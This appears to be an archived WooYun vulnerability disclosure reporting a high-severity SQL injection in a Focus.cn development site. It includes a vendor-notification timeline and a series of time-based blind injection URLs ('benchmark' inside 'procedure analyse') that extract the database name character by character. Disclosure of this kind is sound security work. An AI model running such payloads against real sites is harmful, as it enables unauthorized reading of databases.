乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-23: 细节已通知厂商并且等待厂商处理中 2016-03-23: 厂商已经确认,细节仅向厂商公开 2016-04-02: 细节向核心白帽子及相关领域专家公开 2016-04-12: 细节向普通白帽子公开 2016-04-22: 细节向实习白帽子公开 2016-05-07: 细节向公众公开
...
http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(15000000,md5(1)))),1)-- das
当前数据库为tongji
tongjihttp://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(char_length(database())=6,10000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(1)for(1)))=116,15000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(2)for(1)))=111,10000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(3)for(1)))=110,10000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(4)for(1)))=103,10000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(5)for(1)))=106,10000000),md5(1)))),1)-- http://dev.qhd.focus.cn/common/modules/yezhu/groupweeksort.php?orderby=sum_num procedure analyse((extractvalue(1,benchmark(elt(ascii(mid((ifnull(cast(database() as char),0x20))from(6)for(1)))=105,10000000),md5(1)))),1)--
危害等级:高
漏洞Rank:10
确认时间:2016-03-23 10:09
感谢支持。
暂无